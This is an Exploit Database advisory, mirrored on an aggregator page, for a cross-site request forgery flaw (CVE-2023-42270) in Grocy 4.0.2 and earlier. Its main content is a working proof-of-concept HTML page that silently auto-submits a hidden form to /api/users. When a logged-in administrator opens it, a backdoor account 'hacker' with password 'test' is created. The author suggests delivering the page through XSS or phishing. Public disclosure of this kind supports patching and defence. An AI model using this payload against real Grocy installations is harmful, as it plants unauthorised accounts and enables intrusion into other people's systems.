Grocy <=4.0.2 - CSRF

• Exploit Database
• 160 阅读

• 作者： Chance Proctor
  日期： 2024-01-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51760/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability # Application: Grocy # Version: <= 4.0.2 # Date: 09/21/2023 # Exploit Author: Chance Proctor # Vendor Homepage: https://grocy.info/ # Software Link: https://github.com/grocy/grocy # Tested on: Linux # CVE : CVE-2023-42270       Overview ================================================== When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting. This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from. This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.       Proof of Concept ================================================== Host the following html code via a XSS or delivery via a phishing campaign:   <html> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"> <input name=&apos;username&apos; value=&apos;hacker&apos; type=&apos;hidden&apos;> <input name=&apos;password&apos; value=&apos;test&apos; type=&apos;hidden&apos;> <input type=submit> </form> <script> history.pushState(&apos;&apos;,&apos;&apos;, &apos;/&apos;); document.forms[0].submit(); </script> </html>     If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials   Username: hacker Password: test   Note: In order for this to work, the target must have Create User Permissions. This is enabled by default.       Proof of Exploit/Reproduce ================================================== http://xploit.sh/posts/cve-2023-42270/